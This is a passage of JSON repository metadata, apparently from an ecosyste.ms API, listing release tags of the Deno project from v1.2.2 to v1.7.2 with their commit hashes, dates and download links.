v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/Git